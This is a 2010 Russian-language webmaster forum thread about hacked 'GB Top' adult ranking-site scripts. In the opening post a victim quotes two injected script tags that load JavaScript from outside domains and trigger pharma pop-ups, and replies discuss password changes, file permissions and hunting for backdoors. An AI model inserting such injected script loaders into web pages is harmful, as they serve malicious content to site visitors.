Master-X
Регистрация
|
Вход
Форум
|
Новости
|
Статьи
Главная
»
Форум
»
Топы
»
Тема:
(Лечение!) Ахтунг атакуют топы или дыра GB Top
Новая тема
Ответить
цитата
17/11/10 в 08:05
Дольчик ххх
опять сталкиваюсь с такой проблемой что мои топы поламаны и в них содержит посторонний
Код:
<script language="javascript" src="http://www.clayaim.com/index.php?ref=webex"></script>
<script src=http://crv.cc/c/></script>
При заходи на сайт и после полной загрузки страницы появляется всплывающее поп окошко с рекламой виагры!
П.С. Версию топа обновил до последней версии 5.4 пасы поменял антивирус не выключаю но в скрипте время от времени бывает появляется посторонний код, даже гугл аналистик удалил, может через него как запихивают, хотя сколько работаю в онлайн не разу не сталкивался чтоб сайт был поломан только после того как в скрипте однажды появилась дырочка )
цитата
17/11/10 в 17:56
Retox
Возможно первый раз когда в шаблоны через узявимость был вставлен сплоит - ты заразил комп трояном с ф-цие форм грабер или ФТП снифером.
Хацкер смотря логи трояна увидел пароль на вход в админку и юзает его сейчас, тоже самое и с ФТП - возможно имеет доступ к фтп и инжектит всякие компоненты!
Как вариант
-поменяй пароли к admin.php
-смени ФТП пароль или разреши только с твоего ИП заходить на ФТП
-на файлы темплейтов поставть права 644 (редактировать придётся десктопно)
-проверь комп с помощью KIS и Cure It вохможно где то засел троян, так же на сервере где топы может быть руткит.
цитата
19/11/10 в 23:32
Big Voo
admin.php сделать блокировку доступа по айпи - в настройках вэб сервера
это самое простое
цитата
30/11/10 в 13:42
salo
Владелец
http://top-porn-games.sexgamepark.com
твой топ пробили, консоль тебе подвесили, похоже в футере ищи вражеский скрипт
цитата
30/11/10 в 15:56
Danyil
Удалил...
цитата
01/12/10 в 12:34
Retox
Danyil у тебя тоже через webmasters регу инекцию кода сделали?
Что то повальное заражение идёт....
цитата
01/12/10 в 19:03
Bruno
salo писал:
Владелец
http://top-porn-games.sexgamepark.com
твой топ пробили, консоль тебе подвесили, похоже в футере ищи вражеский скрипт
Ахуенный дез топа! Очень понравился.
цитата
02/12/10 в 19:54
sansay
salo писал:
Владелец
http://top-porn-games.sexgamepark.com
твой топ пробили, консоль тебе подвесили, похоже в футере ищи вражеский скрипт
Спасибо, почистил
цитата
02/12/10 в 21:42
Danyil
С помощью саппорта хоста, вычислили, что у меня на всех топах сетки изменён файл index.php
Всё восстановил, вроде пока проявлений вражеской деятельности незаметно. Затаился гад...
цитата
02/12/10 в 22:54
CrazyMen
Danyil:
Этот же фаил заменяется при обновлении топа
цитата
06/12/10 в 22:56
J_Geer
Danyil писал:
С помощью саппорта хоста, вычислили, что у меня на всех топах сетки изменён файл index.php
Всё восстановил, вроде пока проявлений вражеской деятельности незаметно. Затаился гад...
Я на все index.* ставлю 444, да и на прочее, не требующее записи, тоже по возможности. Во многих случаях спасает...
цитата
11/12/10 в 00:23
salo
как все таки грамотно выставить на ГБ топ права чтобы и от атак обезвредить и чтобы все считало и работало
на саму папку где находится скрипт 755
alternative-templates 755
autorank 755
backupfiles 777
cgi-bin 755
datafiles 777
docs 755
memberfiles 777
templates 755
index.php 644
переименовать admin.php на другой и выставить 755
удалить File phpinfo.php
Все правильно ??? я пережил уже 4 атаки
цитата
11/12/10 в 00:24
salo
я выставлял и на templates 644, на как то через раз открывает страницу топа
цитата
11/12/10 в 12:45
CrazyMen
На пакпу темплейтс оставляйте 777 а на то что внутри 644. фаил uninstall.php тоже удалите.
цитата
11/12/10 в 13:52
Alexandur
alternative-templates 755
autorank 755
cgi-bin 755
docs 755
и не нужны
цитата
11/12/10 в 14:00
CrazyMen
gimcnuk:
Эт точно. Ксттаи такое ощущение что овнеру срикпт не нужен может купим вскладчину?
цитата
11/12/10 в 14:08
Alexandur
Он не продаёт, там алгоритм уникальный.
Вскладчину можно и новый скрипт заказать и выложить по GPL лицензии. Только без меня
цитата
11/12/10 в 14:17
CrazyMen
gimcnuk:
Что так
?
цитата
15/12/10 в 00:00
sansay
Седня п*др опять повесил свою фигню на все мои сайты, правит все сайты на серваке (индексы и протоновский ssi_in.php). Смотрите не было ли у вас рецидива...
цитата
15/12/10 в 19:48
Дольчик ххх
и мои тоже сайты как всегда подверглись очередной атаке, самое интересное это хакеридзе все придумывает и неустает очередные идеи как обмануть честных мастеров, заходил под ру айпи все ок, вирусов нету, а если зайти через зарубежные айпи то вирус как ту появляется, предполагаю что хакер русский или где не далеко, бывает редирект идет на русские ПП и в основном это фарма. Будемс ждать следующей атаки... ;)
цитата
15/12/10 в 21:51
CrazyMen
Ищите айпишник его, выкладывайте надо решать что то
цитата
19/12/10 в 19:00
salo
18 числа опять хакер изменил index.php, стояли права 644, хз че делать, в админке хоста пишет что файл изменил apache
цитата
19/12/10 в 19:12
salo
кое-где он после замены файла права на 444 поменял, как то
цитата
19/12/10 в 19:25
Дольчик ххх
да ваще безобразие творится какое то )
---
Подскажите, если с ГБ скрипта перейти на скрипт сиджей например на кристал, протон, трейд пульс может быть не будет таких атак? ГБ Скрипт все меньше и меньше теряет свои позиции бесплатного популярного скрипта, как раньше было
цитата
19/12/10 в 20:05
Alexandur
salo:
возможно, был залит бекдор и гбскрипт уже не при чём. Поищи сторонние файлы.
Стр.
« первая
<
1
,
2
,
3
,
4
,
5
>
последняя »
Новая тема
Ответить
Эта страница в полной версии